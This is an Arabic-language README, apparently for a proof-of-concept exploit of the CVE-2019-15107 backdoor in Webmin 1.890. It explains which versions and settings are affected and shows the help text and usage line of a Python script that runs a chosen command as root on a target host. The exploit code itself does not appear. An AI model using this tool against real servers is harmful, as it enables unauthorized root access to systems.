
استغلال CVE-2019-15107
تم إصدار ويبمين الإصدار 1.890 مع باب خلفي يمكن لأي شخص لديه معرفة به تنفيذ أوامر كجذر. كما احتوت الإصدارات من 1.900 إلى 1.920 على باب خلفي باستخدام كود مماثل، لكن لم يكن قابلاً للاستغلال في تثبيت ويبمين الافتراضي. فقط إذا قام المسؤول بتمكين الميزة في Webmin -> Webmin Configuration -> Authentication للسماح بتغيير كلمات المرور منتهية الصلاحية يمكن للمهاجم استخدامها.
تحتاج إلى pip3 لتثبيت هذه الحزم.
$ python3 Webmin_exploit.py --help
usage: Webmin_exploit.py [-h] -host IP [-port Port] [-cmd Command]
Webmin 1.890 expired Remote Root POC
optional arguments:
-h, --help show this help message and exit
-host IP Host to attack
-port Port Port of the host ~ 10000 is Default
-cmd Command Command to execute ~ id is Default
python3 Webmin_exploit.py -host target -port 10000 -cmd id
$ python3 Webmin_exploit.py -host target -port 10000 -cmd id